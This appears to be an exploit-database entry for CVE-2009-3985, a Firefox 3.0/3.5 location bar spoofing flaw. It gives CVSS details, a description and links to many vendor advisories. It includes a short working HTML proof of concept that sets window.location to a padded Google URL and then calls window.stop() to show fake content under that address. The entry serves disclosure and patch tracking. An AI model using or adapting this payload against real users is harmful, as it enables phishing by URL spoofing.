Lucene search
Jordi ChancelEXPLOITPACK:8ED19A544263986AFD75DCC9DE252055HistoryDec 18, 2009 - 12:00 a.m.
Mozilla Firefox - Location Bar Spoofing
2009-12-1800:00:00
Jordi Chancel
6
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
Mozilla Firefox - Location Bar Spoofing
# Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY
# Date: 2009-12-18
# Author: Jordi Chancel
# Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html
# Version: Mozilla Firefox 3.0.15 & 3.5.5
# Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK
# CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985
# DESCRIPTION: {
# Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44
# in which a web page can set document.location to a URL that can't be displayed properly and then inject
# content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking
# but invalid URL in the location bar and inject HTML and JavaScript into the body of the
# page, resulting in a spoofing attack. }
# Code :
<html>
<title>FAKE PAGE</title>
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">
<h1>FAKE PAGE</h1>
</body>
</html>Related
packetstorm
packetstorm
Mozilla Firefox Location Bar Spoof
2009-12-18 00:00:00
seebug
seebug
Mozilla Firefox Location Bar Spoofing Vulnerability
2009-12-18 00:00:00
Firefoxๅ
ๅฎนๆณจๅ
ฅ็ฝ้กตๆฌบ้ชๆผๆด
2009-12-18 00:00:00
veracode
veracode
Spoofed Content Association
2020-04-10 00:41:43
exploitdb
exploitdb
Mozilla Firefox - Location Bar Spoofing
2009-12-18 00:00:00
ubuntucve
ubuntucve
CVE-2009-3985
2009-12-15 00:00:00
securityvulns
securityvulns
Mozilla Foundation Security Advisory 2009-69
2009-12-17 00:00:00
Mozilla Firefox multiple security vulnerabilities
2009-12-17 00:00:00
mozilla
mozilla
Location bar spoofing vulnerabilities โ Mozilla
2009-12-15 00:00:00
cve
cve
CVE-2009-3985
2009-12-17 17:30:00
prion
prion
Design/Logic Flaw
2009-12-17 17:30:00
openvas
openvas
Ubuntu USN-873-1 (xulrunner-1.9)
2009-12-30 00:00:00
Ubuntu Update for firefox-3.0, xulrunner-1.9 regression USN-877-1
2010-01-15 00:00:00
Debian: Security Advisory (DSA-1956-1)
2009-12-30 00:00:00
nessus
nessus
openSUSE Security Update : MozillaFirefox (MozillaFirefox-1727)
2009-12-23 00:00:00
openSUSE Security Update : MozillaFirefox (MozillaFirefox-1727)
2009-12-23 00:00:00
SuSE 10 Security Update : XULRunner (ZYPP Patch Number 6736)
2009-12-23 00:00:00
osv
osv
xulrunner - several vulnerabilities
2009-12-16 00:00:00
debian
debian
[SECURITY] [DSA 1956-1] New xulrunner packages fix several vulnerabilities
2009-12-16 21:15:39
centos
centos
firefox, xulrunner security update
2009-12-18 02:04:10
ubuntu
ubuntu
Firefox 3.0 and Xulrunner 1.9 vulnerabilities
2009-12-18 00:00:00
Firefox 3.0 and Xulrunner 1.9 regression
2010-01-08 00:00:00
Firefox 3.5 and Xulrunner 1.9.1 regression
2010-01-08 00:00:00
redhat
redhat
(RHSA-2009:1674) Critical: firefox security update
2009-12-16 00:00:00
oraclelinux
oraclelinux
firefox security update
2009-12-16 00:00:00
fedora
fedora
[SECURITY] Fedora 12 Update: seamonkey-2.0.1-1.fc12
2009-12-18 04:36:12
[SECURITY] Fedora 11 Update: gnome-python2-extras-2.25.3-10.fc11
2009-12-18 04:32:41
[SECURITY] Fedora 11 Update: xulrunner-1.9.1.6-1.fc11
2009-12-18 04:32:41
suse
suse
remote code execution in MozillaFirefox
2009-12-22 15:19:49
freebsd
freebsd
mozilla -- multiple vulnerabilities
2009-12-16 00:00:00
gentoo
gentoo
Mozilla Products: Multiple vulnerabilities
2013-01-08 00:00:00
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
Related for EXPLOITPACK:8ED19A544263986AFD75DCC9DE252055